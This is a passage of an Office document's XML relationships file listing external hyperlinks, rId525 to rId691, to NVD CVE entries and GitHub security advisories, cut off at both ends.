Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81525" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82304" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82684" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82712" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84194" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84203" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86167" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86185" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4vpg-pfj8-m33q" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-crmc-f4m7-33fj" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16233" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16234" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4644" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61639" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61640" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64195" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64196" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64197" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64198" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64200" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67397" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75486" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80114" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80116" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80119" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81302" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85012" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85439" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86095" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76228" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76229" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76230" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76231" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76232" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76233" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76838" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85613" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-3vrx-526r-64rm" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52769" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52771" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66357" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73276" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73812" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76225" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82750" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82751" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85048" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85538" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54600" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55951" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61638" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66835" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73270" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75538" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77348" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77634" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77641" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82262" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82263" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82728" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qp76-pq9f-gr9m" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19219" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54330" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61641" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61699" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72001" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79746" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82302" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85160" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId691" /><Relationship 